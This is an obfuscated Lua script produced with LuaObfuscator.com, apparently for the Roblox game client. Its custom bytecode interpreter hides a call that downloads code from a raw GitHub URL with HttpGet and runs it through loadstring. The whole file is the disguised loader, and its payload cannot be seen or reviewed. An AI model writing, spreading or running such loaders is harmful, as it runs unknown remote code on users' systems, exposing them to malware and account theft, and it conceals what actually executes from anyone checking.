--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v98=0;local v99;while true do if (v98==1) then return v99;end if (v98==0) then v99=v5(v84,v19);v19=nil;v98=1;end end else return v84;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v85=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -((2192 -(1523 + 114)) + 64)))) ;return v85-(v85%(932 -(857 + 74))) ;else local v86=568 -(367 + 201) ;local v87;while true do if (v86==(927 -(214 + 713))) then v87=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v87 + v87))>=v87) and 1) or (877 -(254 + 28 + (847 -252))) ;end end end end local function v21() local v34=1065 -(67 + 1 + 997) ;local v35;while true do if (v34==(1271 -(226 + 1044))) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=118 -(32 + 85) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -(892 + 65)) ;return (v37 * (610 -354)) + v36 ;end local function v23() local v38=(0 -0) + 0 ;local v39;local v40;local v41;local v42;while true do if (v38==1) then return (v42 * (41190819 -24413603)) + (v41 * (48199 + 17337)) + (v40 * (472 -216)) + v39 ;end if ((952 -(802 + 150))==v38) then v39,v40,v41,v42=v1(v16,v18,v18 + (4 -1) );v18=v18 + (354 -(87 + 263)) ;v38=181 -(67 + (1110 -(915 + 82))) ;end end end local function v24() local v43=0 + 0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if ((2 -0)==v43) then v48=v20(v45,1208 -(1069 + 118) ,70 -39 );v49=((v20(v45,116 -84 )==(1 -0)) and  -(1 + (0 -0))) or (860 -(814 + 45)) ;v43=4 -(2 -1) ;end if (v43==(3 + 0)) then if (v48==(791 -(368 + 423))) then if (v47==((0 + 0) -(0 + 0))) then return v49 * (18 -(10 + 8)) ;else local v100=0 -0 ;while true do if (v100==(442 -(416 + 26))) then v48=3 -2 ;v46=0 + (885 -(261 + 624)) ;break;end end end elseif (v48==(3621 -1574)) then return ((v47==(438 -(145 + (520 -227)))) and (v49 * ((431 -(44 + (1466 -(1020 + 60))))/(1423 -(630 + 793))))) or (v49 * NaN) ;end return v8(v49,v48-(2509 -(998 + (1653 -1165))) ) * (v46 + (v47/((1 + 1)^(43 + (42 -33))))) ;end if (v43==(772 -(201 + 571))) then v44=v23();v45=v23();v43=1;end if (v43==1) then v46=(449 + 690) -(116 + 1022) ;v47=(v20(v45,4 -3 ,20) * (2^(19 + (44 -31)))) + v44 ;v43=2;end end end local function v25(v50) local v51;if  not v50 then v50=v23();if (v50==((601 + 1146) -(760 + 987))) then return "";end end v51=v3(v16,v18,(v18 + v50) -(1914 -(1789 + 124)) );v18=v18 + v50 ;local v52={};for v66=767 -(745 + 21) , #v51 do v52[v66]=v2(v1(v3(v51,v66,v66)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v68=(function() return 0 + 0 ;end)();while true do if (v68~=(122 -(17 + 104))) then else if (v53==(2 -0)) then for v101= #"!",v23() do local v102=(function() return 0 + 0 ;end)();local v103=(function() return;end)();local v104=(function() return;end)();while true do if ((0 + 0)~=v102) then else local v107=(function() return 0;end)();local v108=(function() return;end)();while true do if (v107~=(0 -0)) then else v108=(function() return 0;end)();while true do if (v108==(1 -0)) then v102=(function() return 1;end)();break;end if (v108~=(0 + 0)) then else local v162=(function() return 1636 -(1373 + 263) ;end)();while true do if ((1000 -(451 + 549))==v162) then v103=(function() return 0;end)();v104=(function() return nil;end)();v162=(function() return 1;end)();end if ((1 + 0)~=v162) then else v108=(function() return 1 -0 ;end)();break;end end end end break;end end end if (v102~=(1 -0)) then else while true do if (v103==(1384 -(746 + 638))) then v104=(function() return v21();end)();if (v20(v104, #":", #"<")==(0 + 0)) then local v158=(function() return 0 -0 ;end)();local v159=(function() return;end)();local v160=(function() return;end)();local v161=(function() return;end)();while true do if (2~=v158) then else if (v20(v160, #"~", #"]")== #"~") then v161[2]=(function() return v59[v161[343 -(218 + 123) ]];end)();end if (v20(v160,1583 -(1535 + 46) ,2 + 0 )~= #"~") then else v161[ #"19("]=(function() return v59[v161[ #"nil"]];end)();end v158=(function() return 3;end)();end if (v158==1) then v161=(function() return {v22(),v22(),nil,nil};end)();if (v159==(560 -(306 + 254))) then local v176=(function() return 0 + 0 ;end)();local v177=(function() return;end)();while true do if (v176==0) then v177=(function() return 0;end)();while true do if (v177==0) then v161[ #"xxx"]=(function() return v22();end)();v161[ #"http"]=(function() return v22();end)();break;end end break;end end elseif (v159== #"}") then v161[ #"xnx"]=(function() return v23();end)();elseif (v159==2) then v161[ #"asd"]=(function() return v23() -((3 -1)^16) ;end)();elseif (v159== #"xxx") then local v183=(function() return 0;end)();local v184=(function() return;end)();while true do if (v183~=0) then else v184=(function() return 0;end)();while true do if (v184==0) then v161[ #"nil"]=(function() return v23() -((1469 -(899 + 568))^(11 + 5)) ;end)();v161[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v158=(function() return 2;end)();end if (v158==(7 -4)) then if (v20(v160, #"-19", #"-19")~= #":") then else v161[ #".dev"]=(function() return v59[v161[ #"xnxx"]];end)();end v54[v101]=(function() return v161;end)();break;end if (v158~=0) then else local v169=(function() return 603 -(268 + 335) ;end)();local v170=(function() return;end)();while true do if (v169==(290 -(60 + 230))) then v170=(function() return 0;end)();while true do if (v170~=(573 -(426 + 146))) then else v158=(function() return 1 + 0 ;end)();break;end if (v170~=0) then else v159=(function() return v20(v104,1458 -(282 + 1174) , #"nil");end)();v160=(function() return v20(v104, #"0836",6);end)();v170=(function() return 812 -(569 + 242) ;end)();end end break;end end end end end break;end end break;end end end for v105= #"[",v23() do v55[v105-#"[" ]=(function() return v28();end)();end return v57;end break;end if (v68==0) then if (v53~= #"|") then else local v95=(function() return 0;end)();local v96=(function() return;end)();while true do if (v95~=(0 -0)) then else v96=(function() return 0 + 0 ;end)();while true do if (v96==(1025 -(706 + 318))) then for v142= #"]",v58 do local v143=(function() return 1251 -(721 + 530) ;end)();local v144=(function() return;end)();local v145=(function() return;end)();local v146=(function() return;end)();while true do if (v143==1) then v146=(function() return nil;end)();while true do if (v144== #"<") then if (v145== #" ") then v146=(function() return v21()~=0 ;end)();elseif (v145==2) then v146=(function() return v24();end)();elseif (v145~= #"91(") then else v146=(function() return v25();end)();end v59[v142]=(function() return v146;end)();break;end if (v144~=(1271 -(945 + 326))) then else local v172=(function() return 0;end)();local v173=(function() return;end)();while true do if (v172==(0 -0)) then v173=(function() return 0 + 0 ;end)();while true do if (v173==(700 -(271 + 429))) then v145=(function() return v21();end)();v146=(function() return nil;end)();v173=(function() return 1;end)();end if (v173==(1 + 0)) then v144=(function() return  #"}";end)();break;end end break;end end end end break;end if (v143~=(1500 -(1408 + 92))) then else local v163=(function() return 1086 -(461 + 625) ;end)();while true do if (v163==1) then v143=(function() return 1289 -(993 + 295) ;end)();break;end if (0~=v163) then else v144=(function() return 0 + 0 ;end)();v145=(function() return nil;end)();v163=(function() return 1;end)();end end end end end v57[ #"nil"]=(function() return v21();end)();v96=(function() return 1173 -(418 + 753) ;end)();end if (v96==(0 + 0)) then v58=(function() return v23();end)();v59=(function() return {};end)();v96=(function() return 1 + 0 ;end)();end if (v96==(1 + 1)) then v53=(function() return 1 + 1 ;end)();break;end end break;end end end if (v53==(529 -(406 + 123))) then local v97=(function() return 0;end)();while true do if (v97==0) then v54=(function() return {};end)();v55=(function() return {};end)();v97=(function() return 1770 -(1749 + 20) ;end)();end if ((1 + 1)~=v97) then else v53=(function() return  #" ";end)();break;end if (v97==(1323 -(1249 + 73))) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v97=(function() return 2;end)();end end end v68=(function() return 1;end)();end end end end local function v29(v60,v61,v62) local v63=v60[1 + (0 -0) ];local v64=v60[2];local v65=v60[3];return function(...) local v69=v63;local v70=v64;local v71=v65;local v72=v27;local v73=1146 -((1043 -577) + 679) ;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -(2 -1) ;local v78={};local v79={};for v88=1900 -(106 + 1794) ,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 + 0 ];else v79[v88]=v76[v88 + 1 + 0 ];end end local v80=(v77-v71) + (2 -(4 -3)) ;local v81;local v82;while true do v81=v69[v73];v82=v81[2 -1 ];if (v82<=(121 -((757 -(239 + 514)) + 110))) then if (v82<=3) then if (v82<=(585 -(57 + 186 + 341))) then if (v82>(1427 -(41 + 1386))) then v79[v81[2]]=v81[106 -(17 + 86) ];else do return;end end elseif (v82==(2 + 0)) then local v111=0 -0 ;local v112;local v113;local v114;local v115;while true do if ((v111==(5 -3)) or (4372==1850)) then for v154=v112,v74 do local v155=166 -(122 + 44) ;while true do if (v155==(0 -0)) then v115=v115 + (3 -2) ;v79[v154]=v113[v115];break;end end end break;end if (v111==0) then v112=v81[2 + 0 ];v113,v114=v72(v79[v112](v13(v79,v112 + 1 ,v81[1 + 2 ])));v111=1 -0 ;end if ((232<821) and (v111==1)) then v74=(v114 + v112) -(66 -(30 + 35)) ;v115=0 + (1329 -(797 + 532)) ;v111=1259 -(1043 + 214) ;end end else v79[v81[7 -5 ]]();end elseif ((518<902) and (v82<=(1217 -(323 + 889)))) then if ((2994>858) and (v82>(10 -6))) then do return;end else v79[v81[2]]=v62[v81[(424 + 159) -(361 + 219) ]];end elseif (v82>(326 -(53 + 91 + 176))) then v79[v81[1 + 1 ]]=v62[v81[(977 -561) -((1217 -(373 + 829)) + 398) ]];else v79[v81[2]]={};end elseif (v82<=(993 -(18 + 964))) then if ((v82<=((764 -(476 + 255)) -24)) or (3755<=915)) then if ((3946>3743) and (v82==(5 + 3))) then local v121=v81[2 + 0 ];v79[v121]=v79[v121](v13(v79,v121 + (851 -(20 + 830)) ,v74));else local v123=0 + 0 ;local v124;local v125;local v126;local v127;while true do if (((128 -((1246 -(369 + 761)) + 10))==v123) or (1335>=3306)) then for v156=v124,v74 do local v157=0 + 0 ;while true do if ((4844>2253) and (v157==0)) then v127=v127 + 1 ;v79[v156]=v125[v127];break;end end end break;end if ((452==452) and (v123==(739 -(542 + 196)))) then v74=(v126 + v124) -(1 -0) ;v127=0 + 0 ;v123=2 + 0 ;end if ((v123==(0 + 0)) or (4557<2087)) then v124=v81[4 -2 ];v125,v126=v72(v79[v124](v13(v79,v124 + (2 -1) ,v81[1554 -(1126 + 425) ])));v123=406 -(118 + 287) ;end end end elseif (v82==(39 -29)) then local v128=v81[2];v79[v128]=v79[v128](v13(v79,v128 + (1122 -(118 + 1003)) ,v74));else local v130=0 -0 ;local v131;local v132;while true do if ((3874==3874) and (v130==0)) then v131=v81[379 -(142 + 235) ];v132=v79[v81[3]];v130=4 -3 ;end if (v130==1) then v79[v131 + 1 + 0 ]=v132;v79[v131]=v132[v81[4]];break;end end end elseif ((v82<=(990 -(553 + 424))) or (1938>4935)) then if (v82>((13 + 9) -10)) then v79[v81[2]]={};else v79[v81[2 + 0 ]]=v81[3 + 0 ];end elseif (v82>14) then v79[v81[2 -0 ]]();else local v136=v81[2 + 0 ];local v137=v79[v81[2 + (1 -0) ]];v79[v136 + (239 -(64 + 174)) + 0 ]=v137;v79[v136]=v137[v81[4]];end v73=v73 + (2 -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034F3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B696D68656E67393438302D636F6465722F32424B322F726566732F68656164732F6D61696E2F70726F6A656800094Q000D7Q001204000100013Q001204000200023Q00200B00020002000300120C000400044Q0009000200044Q000800013Q00022Q000F0001000100016Q00017Q00",v9(),...);
